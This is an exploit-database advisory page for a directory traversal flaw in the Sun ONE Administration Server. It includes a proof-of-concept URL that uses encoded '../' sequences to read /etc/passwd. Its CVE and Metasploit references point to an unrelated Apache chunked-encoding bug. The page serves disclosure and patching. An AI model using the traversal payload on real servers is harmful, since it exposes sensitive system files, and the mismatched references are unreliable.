header-logo
Suggest Exploit
vendor:
Sun ONE Application Server
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Sun ONE Application Server
Affected Version From: Sun ONE Administration Server 5.1
Affected Version To: Sun ONE Administration Server 6.0
Patch Exists: YES
Related CWE: CVE-2002-0392
CPE: a:sun:sun_one_application_server:5.1
Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2002-0392/https://www.rapid7.com/db/vulnerabilities/http-apache2-chunked-transfer-int-bof/https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-apache-chunked-encoding-vulnerability-cve-2002-0392/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2002

Directory Traversal in Sun ONE Administration Server

A directory traversal vulnerability exists in the Sun ONE Administration Server due to insufficient input validation. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the server, which contains directory traversal sequences such as '../../../../etc/passwd'. This will allow the attacker to access sensitive information, such as the server's password file.

Mitigation:

Sun has released a patch to address this issue.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8367/info

A problem in the checking of input by the Sun ONE Administration Server may lead to remote users escaping into restricted directories. This may allow an attacker to gain access to information that is sensitive in nature.

http://www.example.com:5000/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv

Navigation

Suggest Exploit

Services By CQR